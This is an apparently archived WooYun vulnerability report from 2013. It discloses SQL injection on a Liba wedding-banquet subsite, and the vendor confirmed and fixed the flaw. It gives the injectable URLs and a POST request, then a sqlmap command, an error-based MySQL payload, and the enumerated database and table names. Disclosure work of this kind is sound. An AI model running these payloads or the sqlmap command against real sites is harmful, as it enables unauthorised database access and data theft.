当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-032114

漏洞标题:篱笆网旗下某分站SQL注入漏洞

相关厂商:篱笆网

漏洞作者: lucky

提交时间:2013-07-24 17:23

修复时间:2013-09-07 17:24

公开时间:2013-09-07 17:24

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-24: 细节已通知厂商并且等待厂商处理中
2013-07-24: 厂商已经确认,细节仅向厂商公开
2013-08-03: 细节向核心白帽子及相关领域专家公开
2013-08-13: 细节向普通白帽子公开
2013-08-23: 细节向实习白帽子公开
2013-09-07: 细节向公众公开

简要描述:

详细说明:

天下喜宴网
http://www.tianxiaxiyan.com


注入点1:http://www.tianxiaxiyan.com/index.php/feast/shop_list/money/%5C.html


1.PNG


注入点2:
POST /index.php/feast/search.html HTTP/1.1
Host: www.tianxiaxiyan.com
keywords=%c7%eb%ca%e4%c8%eb%be%c6%b5%ea%c3%fb%b3%c6...&page=%5c


。。。。

注入点:
./sqlmap.py -u "http://www.tianxiaxiyan.com/index.php/feast/search.html" --data "keywords=1" --dbs
Place: POST
Parameter: keywords
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: keywords=1' AND (SELECT 2675 FROM(SELECT COUNT(*),CONCAT(0x3a6f656c3a,(SELECT (CASE WHEN (2675=2675) THEN 1 ELSE 0 END)),0x3a6b6f793a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'qooG'='qooG
---
[03:46:13] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.8
back-end DBMS: MySQL 5.0
available databases [19]:
[*] ad_cheat
[*] bj_marry
[*] cpo
[*] feast
[*] gbb
[*] iliba
[*] import
[*] information_schema
[*] lucky
[*] marry
[*] marry8
[*] marry_count
[*] marry_nihao
[*] marry_search
[*] marry_xiyan
[*] mysql
[*] new_marry
[*] shopping
[*] test
Database: marry
[89 tables]
+---------------------------------+
| ALBUM_SORT_DES |
| ALBUM_SORT_NAME |
| AL_ALBUM |
| AL_ALBUM_DIR |
| AL_DOWNLOAD_WORD_COUNT |
| APPLY |
| APPLY_08new |
| BULLETIN |
| BULLETIN_SHOP |
| CHARGE_RETURN_MONEY |
| CHARGE_RETURN_PERCENT |
| FEAST_ALBUM |
| FEAST_ALBUM_DIR |
| FEAST_ALBUM_SORT |
| FEAST_APPLY |
| FEAST_SHOP |
| FEAST_SHOP_DISH_info |
| FEAST_SHOP_case |
| FEAST_SHOP_log |
| FEAST_SHOP_type |
| FEAST_TRANSFER |
| FILE_LINK |
| F_B |
| ORDER_CHECKOUT |
| ORDER_DATE |
| ORDER_INFO |
| ORDER_INFO_bak |
| ORDER_NOTE |
| SALES_PROMOTION |
| SHOP |
| SHOP_ALBUM |
| SHOP_ALBUM_DIR |
| SHOP_ALBUM_SORT |
| SHOP_BAK |
| SHOP_CASE |
| SHOP_CASE_DIR |
| SHOP_COLLECT |
| SHOP_DAY |
| SHOP_INFO |
| SHOP_MONEY |
| SHOP_MONTH |
| SHOP_ORDER_DAILY |
| SHOP_ORDER_DATE |
| SHOP_PAY |
| SHOP_QA |
| SHOP_RECOMMEND |
| SHOP_REQUIRE |
| SHOP_WEEK |
| SHOP_month_reckoning |
| SORT |
| activity_order |
| activity_order_id |
| beginwell_submit_order_ok |
| employee_activity |
| feast_bless |
| feast_group |
| feast_group_number |
| feast_hall_book |
| feast_hall_hotday |
| feast_hall_info |
| feast_order_autofax |
| feast_order_call_back_log |
| feast_order_change_log |
| feast_order_date |
| feast_order_info |
| feast_shop_qa |
| feast_update_cent_log |
| hotdeal2006_count |
| hotdeal2006_submit_order_cancel |
| hotdeal2006_submit_order_ok |
| hotdeal2006_submit_order_ok_bak |
| import_activity_order |
| marry_shoot_article |
| page_view |
| party_070616 |
| party_info |
| shop_edit |
| shop_editable_field |
| shop_manager_refer |
| tmp_class_cust_marry |
| vote_info |
| vote_liba_bride |
| vote_liba_bride_member |
| vote_option_info |
| vote_user_info |
| wedding_sign |
| work_record |
| work_record_omit |
| z_signup_user |
+---------------------------------+


漏洞证明:

修复方案:

版权声明:转载请注明来源 lucky@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-07-24 17:31

厂商回复:

已修复

最新状态:

暂无